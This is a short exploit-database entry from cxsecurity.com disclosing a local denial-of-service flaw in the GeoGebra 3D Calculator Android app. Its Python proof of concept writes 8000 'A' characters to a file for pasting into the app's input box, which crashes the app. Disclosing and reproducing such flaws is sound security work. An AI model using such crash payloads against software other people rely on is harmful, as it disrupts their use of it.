GeoGebra 3D Calculator 5.0.511.0 Denial of Service (PoC)

2021.03.16
Risk: Medium
Local: Yes
Remote: No
CVE: N/A
CWE: N/A

# Exploit Title: GeoGebra 3D Calculator 5.0.511.0 - Denial of Service (PoC) # Date: 2021-03-15 # Author: Brian Rodríguez # Software Site: https://www.geogebra.org/download # Download Link: https://play.google.com/store/apps/details?id=org.geogebra.android.g3d&utm_source=Download+page&utm_medium=Website&utm_campaign=3D+Calculator+for+Android # Version: 5.0.511.0 # Category: DoS (Android) ##### Vulnerability ##### Graficador GeoGebra 3D is vulnerable to a DoS condition when a long list of characters is being used in field "Entrada..." text box. Successful exploitation will causes application stop working. I have been able to test this exploit against Android 10.0. ##### PoC ##### #!/usr/bin/env python buffer = "\x41" * 8000 try: f = open("payload.txt","w") f.write(buffer) f.close() print ("File created") except: print ("File cannot be created")


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2021, cxsecurity.com

 

Back to Top